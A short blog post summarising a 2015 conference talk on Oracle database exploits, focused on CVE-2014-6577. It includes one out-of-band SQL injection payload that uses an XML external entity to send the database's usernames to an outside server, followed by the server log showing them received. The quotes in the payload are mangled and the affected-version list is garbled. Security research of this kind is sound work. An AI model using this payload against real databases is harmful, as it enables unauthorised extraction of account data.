DOAG 2015: Best of Oracle Security 2015

Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found/modified released in 2015 in various sources.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting,,, 12.1.02, fixed in April 2015 CPU). This bug can be used as helper function in Out-of-band-SQL Injection attacks. Since Oracle 11g the way via utl_http/httpuritype was closed using the ACLs. This exploit opens the possibility in 11g/12g again (if patches are not applied).

—— Out-of-Band SQL Injection Example —————-′ or  1=extractvalue(xmltype(‚<?xml version=“1.0″ encoding=“UTF-8″?><!DOCTYPE root [ <!ENTITY % remote SYSTEM „’||substr((select sys.stragg(distinct username||‘-‚) as string from all_users),1,220)||'“> %remote; %param1;]>‘),’/l‘) – – [18/Nov/2015 00:48:02]  „GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0“ 404 –

—— Out-of-Band SQL Injection Example —————-

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

Comments are closed.